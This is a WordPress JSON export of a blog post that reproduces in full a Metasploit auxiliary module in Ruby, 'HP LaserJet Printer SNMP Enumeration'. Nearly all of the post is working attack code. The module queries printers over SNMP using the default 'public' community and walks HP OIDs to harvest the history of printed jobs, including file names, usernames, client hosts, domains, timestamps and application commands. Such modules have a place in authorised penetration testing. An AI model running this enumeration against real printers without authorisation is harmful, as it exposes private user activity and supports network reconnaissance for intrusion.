{"id":59339,"date":"2024-09-01T04:10:42","date_gmt":"2024-09-01T01:10:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180920\/snmp_enum_hp_laserjet.rb.txt"},"modified":"2024-09-01T04:10:42","modified_gmt":"2024-09-01T01:10:42","slug":"hp-laserjet-printer-snmp-enumeration","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/hp-laserjet-printer-snmp-enumeration\/","title":{"rendered":"HP LaserJet Printer SNMP Enumeration"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘HP LaserJet Printer SNMP Enumeration’,
‘Description’ => %q{
This module allows enumeration of files previously printed.
It provides details as filename, client, timestamp and username information.
The default community used is “public”.
},
‘References’ =>
[
[ ‘URL’, ‘https:\/\/en.wikipedia.org\/wiki\/Simple_Network_Management_Protocol’ ],
[ ‘URL’, ‘https:\/\/net-snmp.sourceforge.io\/docs\/man\/snmpwalk.html’ ],
[ ‘URL’, ‘http:\/\/www.nothink.org\/codes\/snmpcheck\/index.php’ ],
[ ‘URL’, ‘http:\/\/www.securiteam.com\/securitynews\/5AP0S2KGVS.html’ ],
[ ‘URL’, ‘http:\/\/stuff.mit.edu\/afs\/athena\/dept\/cron\/tools\/share\/mibs\/290923.mib’ ],
],
‘Author’ => ‘Matteo Cantoni <goony[at]nothink.org>’,
‘License’ => MSF_LICENSE
))
end<\/p>\n

def run_host(ip)
begin
snmp = connect_snmp<\/p>\n

vprint_status(“Connecting to #{ip}”)<\/p>\n

output_data = []\n

output_data << “IP address : #{ip}”<\/p>\n

sysName = snmp.get_value(‘1.3.6.1.2.1.1.5.0’).to_s
output_data << “Hostname : #{sysName.strip}”<\/p>\n

sysDesc = snmp.get_value(‘1.3.6.1.2.1.1.1.0’).to_s
sysDesc.gsub!(\/^\\s+|\\s+$|\\n+|\\r+\/, ‘ ‘)
output_data << “Description : #{sysDesc.strip}”<\/p>\n

sysContact = snmp.get_value(‘1.3.6.1.2.1.1.4.0’).to_s
output_data << “Contact : #{sysContact.strip}” if not sysContact.empty?<\/p>\n

sysLocation = snmp.get_value(‘1.3.6.1.2.1.1.6.0’).to_s
output_data << “Location : #{sysLocation.strip}” if not sysLocation.empty?<\/p>\n

output_data << “”<\/p>\n

snmp.walk([
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1”, # job-info-name1 – document name1
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.2”, # job-info-name2 – document name2
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1”, # job-info-attr-1 – username
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2”, # job-info-attr-2 – machine name
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.3”, # job-info-attr-3 – domain (?)
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.4”, # job-info-attr-4 – timestamp
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.6”, # job-info-attr-6 – application name
“1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.7”, # job-info-attr-7 – application command
]) do |name1,name2,username,client,domain,timestamp,app_name,app_command|<\/p>\n

filename = name1.value.to_s + name2.value.to_s<\/p>\n

if (username.value.to_s !~ \/noSuchInstance\/)
if username.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
username = $2
end
else
username = ”
end<\/p>\n

if (client.value.to_s !~ \/noSuchInstance\/)
if client.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
client = $2
end
else
client = ”
end<\/p>\n

if (domain.value.to_s !~ \/noSuchInstance\/)
if domain.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
domain = $2
end
else
domain = ”
end<\/p>\n

if (timestamp.value.to_s !~ \/noSuchInstance\/)
if timestamp.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
timestamp = $2
end
else
timestamp = ”
end<\/p>\n

if (app_name.value.to_s !~ \/noSuchInstance\/)
if app_name.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
app_name = $2
end
else
app_name = ”
end<\/p>\n

if (app_command.value.to_s !~ \/noSuchInstance\/)
if app_command.value.to_s =~ \/^JobAcct(\\d+)=(.*)\/
app_command = $2
end
else
app_command = ”
end<\/p>\n

if not timestamp.empty?
output_data << “File name : #{filename}”
output_data << “Username : #{username}” if not username.empty?
output_data << “Client : #{client}” if not client.empty?
output_data << “Domain : #{domain}” if not domain.empty?
output_data << “Timestamp : #{timestamp}” if not timestamp.empty?
output_data << “Application : #{app_name} (#{app_command})” if not app_name.empty?
output_data << “”
end
end<\/p>\n

output_data.each do |row|
print_good(“#{row}”)
end<\/p>\n

disconnect_snmp<\/p>\n

rescue SNMP::RequestTimeout
print_error(“#{ip}, SNMP request timeout.”)
rescue Errno::ECONNREFUSED
print_error(“#{ip}, Connection refused.”)
rescue SNMP::InvalidIpAddress
print_error(“#{ip}, Invalid IP Address. Check it with ‘snmpwalk tool’.”)
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error(“#{ip}, Unknown error: #{e.class} #{e}”)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::SNMPClientinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initialize(info = {})super(update_info(info,‘Name’ => ‘HP LaserJet Printer SNMP Enumeration’,‘Description’ => %q{This module allows enumeration of files previously printed.It provides details as filename, client, timestamp and username information.The default community used is “public”.},‘References’ =>[[ ‘URL’, ‘https:\/\/en.wikipedia.org\/wiki\/Simple_Network_Management_Protocol’ ],[ ‘URL’, ‘https:\/\/net-snmp.sourceforge.io\/docs\/man\/snmpwalk.html’ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59339","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59339"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59339\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59339"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}